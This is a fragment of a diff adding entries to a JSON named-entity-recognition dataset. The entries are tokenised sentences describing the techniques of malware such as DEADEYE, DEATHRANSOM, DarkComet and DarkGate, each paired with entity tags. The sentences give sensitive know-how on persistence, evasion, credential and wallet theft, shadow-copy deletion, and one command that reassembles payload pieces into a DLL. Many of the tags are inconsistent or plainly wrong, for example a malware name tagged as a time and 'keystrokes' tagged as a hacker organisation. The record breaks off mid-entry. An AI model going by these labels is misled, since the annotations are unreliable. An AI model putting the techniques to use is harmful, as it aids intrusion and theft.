"on", + "intended", + "systems", + "by", + "identifying", + "the", + "victim's", + "volume", + "serial", + "number,", + "hostname,", + "and/or", + "DNS", + "domain." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DEADEYE", + "has", + "used", + "`schtasks", + "/change`", + "to", + "modify", + "scheduled", + "tasks", + "including", + "`\\Microsoft\\Windows\\PLA\\Server", + "Manager", + "Performance", + "Monitor`,", + "`\\Microsoft\\Windows\\Ras\\ManagerMobility,", + "\\Microsoft\\Windows\\WDI\\SrvSetupResults`,", + "and", + "`\\Microsoft\\Windows\\WDI\\USOShared`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DEADEYE", + "can", + "use", + "`msiexec.exe`", + "for", + "execution", + "of", + "malicious", + "DLL." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "DEADEYE.EMBED", + "variant", + "of", + "DEADEYE", + "can", + "embed", + "its", + "payload", + "in", + "an", + "alternate", + "data", + "stream", + "of", + "a", + "local", + "file." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DEADEYE", + "can", + "execute", + "the", + "`GetComputerNameA`", + "and", + "`GetComputerNameExA`", + "WinAPI", + "functions." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "DEADEYE", + "can", + "use", + "`rundll32.exe`", + "for", + "execution", + "of", + "living", + "off", + "the", + "land", + "binaries", + "(lolbin)", + "such", + "as", + "`SHELL32.DLL`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "DEADEYE", + "has", + "used", + "the", + "scheduled", + "tasks", + "`\\Microsoft\\Windows\\PLA\\Server", + "Manager", + "Performance", + "Monitor`,", + "`\\Microsoft\\Windows\\Ras\\ManagerMobility`,", + "`\\Microsoft\\Windows\\WDI\\SrvSetupResults`,", + "and", + "`\\Microsoft\\Windows\\WDI\\USOShared`", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DEADEYE", + "can", + "enumerate", + "a", + "victim", + "computer's", + "volume", + "serial", + "number", + "and", + "host", + "name." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DEADEYE", + "can", + "discover", + "the", + "DNS", + "domain", + "name", + "of", + "a", + "targeted", + "system." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DEADEYE", + "can", + "run", + "`cmd", + "/c", + "copy", + "/y", + "/b", + "C:\\Users\\public\\syslog_6-*.dat", + "C:\\Users\\public\\syslog.dll`", + "to", + "combine", + "separated", + "sections", + "of", + "code", + "into", + "a", + "single", + "DLL", + "prior", + "to", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DEATHRANSOM", + "can", + "use", + "public", + "and", + "private", + "key", + "pair", + "encryption", + "to", + "encrypt", + "files", + "for", + "ransom", + "payment." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "B-OffAct", + "O" + ] + }, + { + "tokens": [ + "DEATHRANSOM", + "can", + "use", + "loop", + "operations", + "to", + "enumerate", + "directories", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Tool", + "B-Features", + "O", + "B-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DEATHRANSOM", + "can", + "download", + "files", + "to", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DEATHRANSOM", + "can", + "delete", + "volume", + "shadow", + "copies", + "on", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DEATHRANSOM", + "has", + "the", + "ability", + "to", + "use", + "loop", + "operations", + "to", + "enumerate", + "network", + "resources." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-OffAct", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "DEATHRANSOM", + "can", + "enumerate", + "logical", + "drives", + "on", + "a", + "target", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Some", + "versions", + "of", + "DEATHRANSOM", + "have", + "performed", + "language", + "ID", + "and", + "keyboard", + "layout", + "checks;", + "if", + "either", + "of", + "these", + "matched", + "Russian,", + "Kazakh,", + "Belarusian,", + "Ukrainian", + "or", + "Tatar", + "DEATHRANSOM", + "would", + "exit." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Area", + "B-Area", + "B-Area", + "B-Area", + "O", + "B-Area", + "B-HackOrg", + "O", + "O" + ] + }, + { + "tokens": [ + "DEATHRANSOM", + "can", + "use", + "HTTPS", + "to", + "download", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DEATHRANSOM", + "has", + "the", + "ability", + "to", + "use", + "WMI", + "to", + "delete", + "volume", + "shadow", + "copies." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "DOGCALL", + "can", + "capture", + "microphone", + "data", + "from", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DOGCALL", + "is", + "capable", + "of", + "leveraging", + "cloud", + "storage", + "APIs", + "such", + "as", + "Cloud,", + "Box,", + "Dropbox,", + "and", + "Yandex", + "for", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "B-Tool", + "B-Tool", + "B-Way", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "DOGCALL", + "is", + "encrypted", + "using", + "single-byte", + "XOR." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "DOGCALL", + "can", + "download", + "and", + "execute", + "additional", + "payloads." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "DOGCALL", + "is", + "capable", + "of", + "logging", + "keystrokes." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "DOGCALL", + "is", + "capable", + "of", + "capturing", + "screenshots", + "of", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DRATzarus", + "can", + "collect", + "information", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DRATzarus", + "can", + "use", + "`IsDebuggerPresent`", + "to", + "detect", + "whether", + "a", + "debugger", + "is", + "present", + "on", + "a", + "victim." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DRATzarus", + "can", + "deploy", + "additional", + "tools", + "onto", + "an", + "infected", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DRATzarus", + "has", + "been", + "named", + "`Flash.exe`,", + "and", + "its", + "dropper", + "has", + "been", + "named", + "`IExplorer`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DRATzarus", + "can", + "use", + "various", + "API", + "calls", + "to", + "see", + "if", + "it", + "is", + "running", + "in", + "a", + "sandbox." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DRATzarus", + "can", + "be", + "partly", + "encrypted", + "with", + "XOR." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DRATzarus", + "can", + "enumerate", + "and", + "examine", + "running", + "processes", + "to", + "determine", + "if", + "a", + "debugger", + "is", + "present." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DRATzarus", + "can", + "search", + "for", + "other", + "machines", + "connected", + "to", + "compromised", + "host", + "and", + "attempt", + "to", + "map", + "the", + "network." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DRATzarus's", + "dropper", + "can", + "be", + "packed", + "with", + "UPX." + ], + "ner_tags": [ + "B-Idus", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "DRATzarus", + "can", + "obtain", + "a", + "list", + "of", + "users", + "from", + "an", + "infected", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DRATzarus", + "can", + "use", + "the", + "`GetTickCount`", + "and", + "`GetSystemTimeAsFileTime`", + "API", + "calls", + "to", + "inspect", + "system", + "time." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DRATzarus", + "can", + "use", + "the", + "`GetTickCount`", + "and", + "`GetSystemTimeAsFileTime`", + "API", + "calls", + "to", + "measure", + "function", + "timing.", + "DRATzarus", + "can", + "also", + "remotely", + "shut", + "down", + "into", + "sleep", + "mode", + "under", + "specific", + "conditions", + "to", + "evade", + "detection." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DRATzarus", + "can", + "use", + "HTTP", + "or", + "HTTPS", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dacls", + "can", + "encrypt", + "its", + "configuration", + "file", + "with", + "AES", + "CBC." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Dacls", + "can", + "scan", + "directories", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dacls", + "has", + "had", + "its", + "payload", + "named", + "with", + "a", + "dot", + "prefix", + "to", + "make", + "it", + "hidden", + "from", + "view", + "in", + "the", + "Finder", + "application." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dacls", + "can", + "download", + "its", + "payload", + "from", + "a", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dacls", + "can", + "establish", + "persistence", + "via", + "a", + "LaunchAgent." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Dacls", + "can", + "establish", + "persistence", + "via", + "a", + "Launch", + "Daemon." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Way" + ] + }, + { + "tokens": [ + "The", + "Dacls", + "Mach-O", + "binary", + "has", + "been", + "disguised", + "as", + "a", + ".nib", + "file." + ], + "ner_tags": [ + "O", + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Dacls", + "can", + "collect", + "data", + "on", + "running", + "and", + "parent", + "processes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dacls", + "can", + "use", + "HTTPS", + "in", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DanBot", + "can", + "use", + "use", + "IPv4", + "A", + "records", + "and", + "IPv6", + "AAAA", + "DNS", + "records", + "in", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DanBot", + "can", + "upload", + "files", + "from", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DanBot", + "can", + "use", + "a", + "VBA", + "macro", + "to", + "decode", + "its", + "payload", + "prior", + "to", + "installation", + "and", + "execution." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DanBot", + "can", + "Base64", + "encode", + "its", + "payload." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DanBot", + "can", + "delete", + "its", + "configuration", + "file", + "after", + "installation." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "DanBot", + "can", + "download", + "additional", + "files", + "to", + "a", + "targeted", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DanBot", + "has", + "relied", + "on", + "victims'", + "opening", + "a", + "malicious", + "file", + "for", + "initial", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DanBot", + "files", + "have", + "been", + "named", + "`UltraVNC.exe`", + "and", + "`WINVNC.exe`", + "to", + "appear", + "as", + "legitimate", + "VNC", + "tools." + ], + "ner_tags": [ + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DanBot", + "can", + "use", + "a", + "scheduled", + "task", + "for", + "installation." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DanBot", + "has", + "been", + "distributed", + "within", + "a", + "malicious", + "Excel", + "attachment", + "via", + "spearphishing", + "emails." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "DanBot", + "can", + "use", + "VNC", + "for", + "remote", + "access", + "to", + "targeted", + "systems." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DanBot", + "can", + "use", + "a", + "VBA", + "macro", + "embedded", + "in", + "an", + "Excel", + "file", + "to", + "drop", + "the", + "payload." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "DanBot", + "can", + "use", + "HTTP", + "in", + "C2", + "communication." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DanBot", + "has", + "the", + "ability", + "to", + "execute", + "arbitrary", + "commands", + "via", + "`cmd.exe`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "DarkComet", + "can", + "listen", + "in", + "to", + "victims'", + "conversations", + "through", + "the", + "system’s", + "microphone." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkComet", + "can", + "steal", + "data", + "from", + "the", + "clipboard." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkComet", + "can", + "execute", + "various", + "types", + "of", + "scripts", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkComet", + "can", + "disable", + "Security", + "Center", + "functions", + "like", + "the", + "Windows", + "Firewall." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Org", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "DarkComet", + "can", + "disable", + "Security", + "Center", + "functions", + "like", + "anti-virus." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "DarkComet", + "can", + "load", + "any", + "files", + "onto", + "the", + "infected", + "machine", + "to", + "execute." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkComet", + "has", + "a", + "keylogging", + "capability." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkComet", + "has", + "dropped", + "itself", + "onto", + "victim", + "machines", + "with", + "file", + "names", + "such", + "as", + "WinDefender.Exe", + "and", + "winupdate.exe", + "in", + "an", + "apparent", + "attempt", + "to", + "masquerade", + "as", + "a", + "legitimate", + "file." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkComet", + "adds", + "a", + "Registry", + "value", + "for", + "its", + "installation", + "routine", + "to", + "the", + "Registry", + "Key", + "<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", + "Enable", + "LUA=”0”</code>", + "and", + "<code>HKEY_CURRENT_USER\\Software\\DC3_FEXEC</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "DarkComet", + "can", + "list", + "active", + "processes", + "running", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkComet", + "adds", + "several", + "Registry", + "entries", + "to", + "enable", + "automatic", + "execution", + "at", + "every", + "system", + "startup." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkComet", + "can", + "open", + "an", + "active", + "screen", + "of", + "the", + "victim’s", + "machine", + "and", + "take", + "control", + "of", + "the", + "mouse", + "and", + "keyboard." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkComet", + "has", + "the", + "option", + "to", + "compress", + "its", + "payload", + "using", + "UPX", + "or", + "MPRESS." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "DarkComet", + "can", + "collect", + "the", + "computer", + "name,", + "RAM", + "used,", + "and", + "operating", + "system", + "version", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkComet", + "gathers", + "the", + "username", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Idus", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkComet", + "can", + "access", + "the", + "victim’s", + "webcam", + "to", + "take", + "pictures." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkComet", + "can", + "use", + "HTTP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkComet", + "can", + "launch", + "a", + "remote", + "shell", + "to", + "execute", + "commands", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "elevates", + "accounts", + "created", + "through", + "the", + "malware", + "to", + "the", + "local", + "administration", + "group", + "during", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "will", + "search", + "for", + "cryptocurrency", + "wallets", + "by", + "examining", + "application", + "window", + "names", + "for", + "specific", + "strings.", + "DarkGate", + "extracts", + "information", + "collected", + "via", + "NirSoft", + "tools", + "from", + "the", + "hosting", + "process's", + "memory", + "by", + "first", + "identifying", + "the", + "window", + "through", + "the", + "<code>FindWindow</code>", + "API", + "function." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "uses", + "AutoIt", + "scripts", + "dropped", + "to", + "a", + "hidden", + "directory", + "during", + "initial", + "installation", + "phases,", + "such", + "as", + "`test.au3`." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "DarkGate", + "searches", + "for", + "stored", + "credentials", + "associated", + "with", + "cryptocurrency", + "wallets", + "and", + "notifies", + "the", + "command", + "and", + "control", + "server", + "when", + "identified." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "uses", + "two", + "distinct", + "User", + "Account", + "Control", + "(UAC)", + "bypass", + "techniques", + "to", + "escalate", + "privileges." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "starts", + "a", + "thread", + "on", + "execution", + "that", + "captures", + "clipboard", + "data", + "and", + "logs", + "it", + "to", + "a", + "predefined", + "log", + "file." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "use", + "Nirsoft", + "Network", + "Password", + "Recovery", + "or", + "NetPass", + "tools", + "to", + "steal", + "stored", + "RDP", + "credentials", + "in", + "some", + "malware", + "versions." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "I-Purp", + "I-Purp", + "B-Tool", + "B-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "includes", + "one", + "infection", + "vector", + "that", + "leverages", + "a", + "malicious", + "\"KeyScramblerE.DLL\"", + "library", + "that", + "will", + "load", + "during", + "the", + "execution", + "of", + "the", + "legitimate", + "KeyScrambler", + "application." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "can", + "cloak", + "command", + "and", + "control", + "traffic", + "in", + "DNS", + "records", + "from", + "legitimate", + "services", + "to", + "avoid", + "reputation-based", + "detection", + "techniques." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Way", + "I-Way", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "can", + "deploy", + "follow-on", + "ransomware", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "will", + "retrieved", + "encrypted", + "commands", + "from", + "its", + "command", + "and", + "control", + "server", + "for", + "follow-on", + "actions", + "such", + "as", + "cryptocurrency", + "mining." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "checks", + "the", + "<code>BeingDebugged</code>", + "flag", + "in", + "the", + "PEB", + "structure", + "during", + "execution", + "to", + "identify", + "if", + "the", + "malware", + "is", + "being", + "debugged." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "installation", + "includes", + "binary", + "code", + "stored", + "in", + "a", + "file", + "located", + "in", + "a", + "hidden", + "directory,", + "such", + "as", + "<code>shell.txt</code>,", + "that", + "is", + "decrypted", + "then", + "executed.", + "DarkGate", + "uses", + "hexadecimal-encoded", + "shellcode", + "payloads", + "during", + "installation", + "that", + "are", + "called", + "via", + "Windows", + "API", + "<code>CallWindowProc()</code>", + "to", + "decode", + "and", + "then", + "execute." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DarkGate", + "will", + "terminate", + "processes", + "associated", + "with", + "several", + "security", + "software", + "products", + "if", + "identified", + "during", + "execution." + ], + "ner_tags": [ + 